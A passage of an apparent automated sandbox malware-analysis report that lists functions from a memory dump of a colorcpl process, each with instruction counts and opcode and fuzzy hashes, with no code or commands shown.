                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BFBDC Relevance: .1, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a0098d64843378da610105f93eb257d99676a7b702d2994faaaa906aaea376f
                                                                                                    • Instruction ID: bc66a5805abfe0373f1d239a3f78dddeeac0a9a7cf5ffd8d89ca3a83c6d8b154
                                                                                                    • Opcode Fuzzy Hash: 3a0098d64843378da610105f93eb257d99676a7b702d2994faaaa906aaea376f
                                                                                                    • Instruction Fuzzy Hash: 05411236B00145ABCB15DF68CC50BAF7769EF81750F964268ED019B2A0D732EE81CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6FDC27 Relevance: .1, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dac19dea8a90594c03d4a2b98face7a6771f95fd0833d757c53d7d2a8beab2a9
                                                                                                    • Instruction ID: 8b433ebd9ffb4136614c22b525d2d8507c5e6b0bef368d3f546432462a7fc3af
                                                                                                    • Opcode Fuzzy Hash: dac19dea8a90594c03d4a2b98face7a6771f95fd0833d757c53d7d2a8beab2a9
                                                                                                    • Instruction Fuzzy Hash: B541ED71204341CBD315CF69C8A0B2ABBEAEB95704F844B2DE8A6C7381DB74E846C761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6FBEE6 Relevance: .1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                                                                                    • Instruction ID: 4463b1b0f43b9fa474feb50200d5c81a7493f34c1906c8b97d59cc636570c471
                                                                                                    • Opcode Fuzzy Hash: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                                                                                    • Instruction Fuzzy Hash: 86311432702691EBC3168B68CC74F6ABBAAEF45780F944750F8428B745D775EC81C794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65FCA0 Relevance: .1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7739d8abad64a8aa799cd644a6ee15780e30c2fc40ae2b428687d195409032af
                                                                                                    • Instruction ID: 3e94e0b59ed3128e129d2f9944dfefbe3ce3f1330d129779d4946d7cb28bc56e
                                                                                                    • Opcode Fuzzy Hash: 7739d8abad64a8aa799cd644a6ee15780e30c2fc40ae2b428687d195409032af
                                                                                                    • Instruction Fuzzy Hash: F941DE71B14B868BE720CF25C454B1673E6BF463A4F848B1AE8968B7C4C738D581CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E639BC4 Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d0e93778264d02a4a711837860e7e11a396fe89af5631bdb9a39475dac0d888b
                                                                                                    • Instruction ID: 2f624526f8a259b480487df33d6c346f7d669d7dd0eb6cef7da7e4589ab5654a
                                                                                                    • Opcode Fuzzy Hash: d0e93778264d02a4a711837860e7e11a396fe89af5631bdb9a39475dac0d888b
                                                                                                    • Instruction Fuzzy Hash: D6419275A0026D8BDB24CF2AC8C8AA9B3F5FB55301FA406E9D80D97249E7709E80CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E661876 Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2bf57af13ec460f4e2de4375beb1bbef415a30e281738ebb33e068d9d984f9c1
                                                                                                    • Instruction ID: 237f7b6b6cf71eb7d5c5f4a9219b07c07cb9247ded6927d8febba9edeaa6e717
                                                                                                    • Opcode Fuzzy Hash: 2bf57af13ec460f4e2de4375beb1bbef415a30e281738ebb33e068d9d984f9c1
                                                                                                    • Instruction Fuzzy Hash: 8B418BB5E00256DFDB05CF59C490BA9B7F2FF89350F5582AAE918AB390D734AD01CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6AFF42 Relevance: .1, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0c8c7756ec128f437a8584659846a7e7c1fb332ca87502654ce79b07cefbf844
                                                                                                    • Instruction ID: 785c05a47272726a9049a7c24ea1966a47db6408d3ff3aee1594be639dbfa0cd
                                                                                                    • Opcode Fuzzy Hash: 0c8c7756ec128f437a8584659846a7e7c1fb332ca87502654ce79b07cefbf844
                                                                                                    • Instruction Fuzzy Hash: ED4191B5D01248EFDB14CFA5D940BEEBBFAEF49700F90462AE455A7250DB30A941CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627C40 Relevance: .1, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a39c583591a6ef49d2653b147ca3d602d7e07e66d93ee4a19f354fa345ad6c6c
                                                                                                    • Instruction ID: 90b5347134706db15e2869eef11e4f65cb4f769a7400888cb1ac8e397bdbc937
                                                                                                    • Opcode Fuzzy Hash: a39c583591a6ef49d2653b147ca3d602d7e07e66d93ee4a19f354fa345ad6c6c
                                                                                                    • Instruction Fuzzy Hash: E8310635641756EFC3259F25CC61F2A77A6FF01B61FD14B29E45A0B6A0D730B800CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E667F51 Relevance: .1, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7b7d9693027e6c7e79a97d219c2fd90e8e28550797327b1a4e47ff34366fe95d
                                                                                                    • Instruction ID: d73dc9e96ea37ec8a1e140dd2c2553286631fc7ce6f88798cabbf7b1461d81d2
                                                                                                    • Opcode Fuzzy Hash: 7b7d9693027e6c7e79a97d219c2fd90e8e28550797327b1a4e47ff34366fe95d
                                                                                                    • Instruction Fuzzy Hash: FA31D472A21611CBCB24CF3AC850A6BB7F6EF8A7507918A6AE445CB350E734DC40C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E637E96 Relevance: .1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                                                                                    • Instruction ID: b923ec11cb30012a4a7bf7751b4e44df0b355e5b2e623df8de27fee90fd72163
                                                                                                    • Opcode Fuzzy Hash: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                                                                                    • Instruction Fuzzy Hash: F4312875A026CABED705DB74C890BDAFB95BF42204F74475EC01C47201EB387959C7A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62DEA5 Relevance: .1, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6fa8d8b043a67a1cf1f64c9dcc76c7551672d76ce2b24fd86b889368b8ce5df3
                                                                                                    • Instruction ID: 386f61ae6647e87f47226b11fa3b3024d97b19b193bb3954d67713dad63a174b
                                                                                                    • Opcode Fuzzy Hash: 6fa8d8b043a67a1cf1f64c9dcc76c7551672d76ce2b24fd86b889368b8ce5df3
                                                                                                    • Instruction Fuzzy Hash: 5E31AFB1201642DFD728CF54C890A5AB7BAFFA5708BE08A2ED0598B751D771F841CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E657962 Relevance: .1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f0a3af76ddd6a91b9ba05fe908646bec8ce4ec01d5b5fcfa6571d6f896ff914
                                                                                                    • Instruction ID: f0f0d14f7a416e998da898e93bb8f19f96c1d772ab46292c18d6b0e7ca4afd28
                                                                                                    • Opcode Fuzzy Hash: 6f0a3af76ddd6a91b9ba05fe908646bec8ce4ec01d5b5fcfa6571d6f896ff914
                                                                                                    • Instruction Fuzzy Hash: B4313871A00189EFDF068F99CC909AEBBB6FF49384F914569FA45A7210C339EA50DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66196E Relevance: .1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5e83ac62f9b19783e513c68975baacdd8c119e376795f8a3421988f79caf789
                                                                                                    • Instruction ID: 2a510099407f9c954e82aa8cf83caf2b4bfeee4cc8b47a015543a33c498fa6df
                                                                                                    • Opcode Fuzzy Hash: d5e83ac62f9b19783e513c68975baacdd8c119e376795f8a3421988f79caf789
                                                                                                    • Instruction Fuzzy Hash: 61316FB1914253DFE311CB18C9C1B6977E9EB8D760F900719E14ADB290FB71AA81CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62D6AA Relevance: .1, Instructions: 93COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                    • Instruction ID: 2cdec028ab12406a7db33aaa82ca32af3ace4d4bb5382f5fecce1d219496a2af
                                                                                                    • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                    • Instruction Fuzzy Hash: 5231BF76A01246AFDF118E54C890F5A7BBAEB95750FE68638AD049B250D338DD40CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BD4E Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40a55acd242a14859fef7661f3c4825b3016a1dc0310fc01f6871aa5412c2d06
                                                                                                    • Instruction ID: 142ad15ffd191c93976ac31c68b655eca9772ef0764d21a79235c1f0347f4afc
                                                                                                    • Opcode Fuzzy Hash: 40a55acd242a14859fef7661f3c4825b3016a1dc0310fc01f6871aa5412c2d06
                                                                                                    • Instruction Fuzzy Hash: D6312B71A11165EBCB01DF65CC41ABFB7B9FF48700B840669F902EB250E734AE10CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62DE10 Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf3f0434dff335bfe690e83c8215db02d0f2f7dd5f67888c9307a503729f2ad6
                                                                                                    • Instruction ID: a721994898577175618fde4a52a78e6551df690a81bd945bcc35d817cb0587df
                                                                                                    • Opcode Fuzzy Hash: bf3f0434dff335bfe690e83c8215db02d0f2f7dd5f67888c9307a503729f2ad6
                                                                                                    • Instruction Fuzzy Hash: 5F41A2B5D00359EEDB10CFAAD980AEDFBF4BB49700F90826EE559A7241DB305A84CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E701C3C Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                    • Instruction ID: a14acf4fa1c48843b708f4a845ef4344f0af664ddf17fbb92513d66766d4ffa0
                                                                                                    • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                    • Instruction Fuzzy Hash: 18318EB1E00125EBD744DF69C480AAEB7F1FF49311F158269D894DB351D734EA51CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D1800 Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1925d21079dc9b2cd4084dc6c7d8ee0d2a7bd9910c5ac426619cf122651f5061
                                                                                                    • Instruction ID: 8fa4ea107c91d4d3edc7955251436c2e2e7437d1ef8212e189a013729ed422a1
                                                                                                    • Opcode Fuzzy Hash: 1925d21079dc9b2cd4084dc6c7d8ee0d2a7bd9910c5ac426619cf122651f5061
                                                                                                    • Instruction Fuzzy Hash: DF31B136D0038AEBDB11CE85CC40F8A7BA9FF45760F9142A5E9409B250C3B1ED64DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E629D96 Relevance: .1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                                                    • Instruction ID: 2abf027dfd793936648015ac399d1ba74203457070f6d72f113305170f5fbb58
                                                                                                    • Opcode Fuzzy Hash: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                                                    • Instruction Fuzzy Hash: 52314876600650EFC711CF18CC80F4AB7B9EF85790F988269E558CF242DA35ED41CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E661C7C Relevance: .1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5aa1581b76ec844e0a832e4b9bd8de25188f6a49d7b1f7b03bea876260e42600
                                                                                                    • Instruction ID: 4bdca27aac98961131c61d057baf4afdcbfa6c6f8e58c27bae06488865ca9504
                                                                                                    • Opcode Fuzzy Hash: 5aa1581b76ec844e0a832e4b9bd8de25188f6a49d7b1f7b03bea876260e42600
                                                                                                    • Instruction Fuzzy Hash: 0531E17A6206A2DFD701DF59C4C039A37B5EF1D350F914279EC88DB200E774DA028B84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D9E56 Relevance: .1, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c034d317b1ff391979d239163e6d70ad04abefaf774b5bfe93cec8477e7b3e55
                                                                                                    • Instruction ID: 0e8f229b7a26f120089bb6d0d65b91b3647495013a780a06d136d6f58c491752
                                                                                                    • Opcode Fuzzy Hash: c034d317b1ff391979d239163e6d70ad04abefaf774b5bfe93cec8477e7b3e55
                                                                                                    • Instruction Fuzzy Hash: 5C31C470A107828BD314CF6AC544716BBEAFFC6324F98CB2DD4A987290D770D809CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633EF4 Relevance: .1, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                                                    • Instruction ID: a77043030397b8386b2a9b5e320b294f0f9a8c08c7ffd9efd36645547f524617
                                                                                                    • Opcode Fuzzy Hash: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                                                    • Instruction Fuzzy Hash: D221AE39640254EFD711DB9ACD80E9BBBBAEF85B81FA14669E51997310D230EE40CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66B970 Relevance: .1, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: df5ecbe202d80c9431c8cab0418e71b00cd63dff9c6539d5b7919d4bab28d3b7
                                                                                                    • Instruction ID: b05b99baeb62c4186931e1af8efb90266c115b46b666ffcf73826844dbae3600
                                                                                                    • Opcode Fuzzy Hash: df5ecbe202d80c9431c8cab0418e71b00cd63dff9c6539d5b7919d4bab28d3b7
                                                                                                    • Instruction Fuzzy Hash: D1319F39621986FFD7019F25DE44A8ABBA6FF8A350F946621E90147A61D735FC30CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D7F3E Relevance: .1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c93c25ceb6864824127cd0c1b1bca1bacde47f0bda7bbca02f2b2e7e43e2787d
                                                                                                    • Instruction ID: 7efc0dff1a1ad7e66700cb20e9b8aef55134095355038f3b93d1209f19815f2c
                                                                                                    • Opcode Fuzzy Hash: c93c25ceb6864824127cd0c1b1bca1bacde47f0bda7bbca02f2b2e7e43e2787d
                                                                                                    • Instruction Fuzzy Hash: 7731F3B5E0025A8BDB00CFA9C488ADDFBF5BF48350F95822AE855B3250DB34A941CF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633DD0 Relevance: .1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a8a6358be12509c6042863928d1a1517edee874b4675552ef4e413ec25245fb1
                                                                                                    • Instruction ID: bd4f45f8780cc323a794ec804092b44f8998644bf3f105c29dc94b719dedc362
                                                                                                    • Opcode Fuzzy Hash: a8a6358be12509c6042863928d1a1517edee874b4675552ef4e413ec25245fb1
                                                                                                    • Instruction Fuzzy Hash: 0F31DF76A01754CFDB00CF99C880B8EB7F2AF95725F60461AE8299B380C779E900CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633616 Relevance: .1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: be9907f7cfc09a8383cd664f184ab6fd7c56afccdff34c125d6552ff2c446b9d
                                                                                                    • Instruction ID: 2207ed2f735b3e538bc1fa54ff49c53bb76ed77f3211febc5c7128ab158cccb0
                                                                                                    • Opcode Fuzzy Hash: be9907f7cfc09a8383cd664f184ab6fd7c56afccdff34c125d6552ff2c446b9d
                                                                                                    • Instruction Fuzzy Hash: AD2134311462919FDB219F44C984B5ABBA2FF83B12FF10B29E9590B750C730E844CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6E9EDF Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24d70f97034e45b3790e6e13c47cfe03ae90d0219eca2f13fbe7e55ebcae098d
                                                                                                    • Instruction ID: d92748893709694284b0e96e7596a6589efd09bd84a871f05aa47c2301dc44a3
                                                                                                    • Opcode Fuzzy Hash: 24d70f97034e45b3790e6e13c47cfe03ae90d0219eca2f13fbe7e55ebcae098d
                                                                                                    • Instruction Fuzzy Hash: 90213772E01655EFCB05DF98C980F9EBBBAEF85754F5402A5F900AB291D670DE01CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E643BD6 Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
